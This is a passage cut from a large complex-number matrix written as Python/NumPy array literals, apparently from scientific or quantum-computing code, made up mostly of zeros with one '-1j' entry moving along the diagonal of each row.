0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
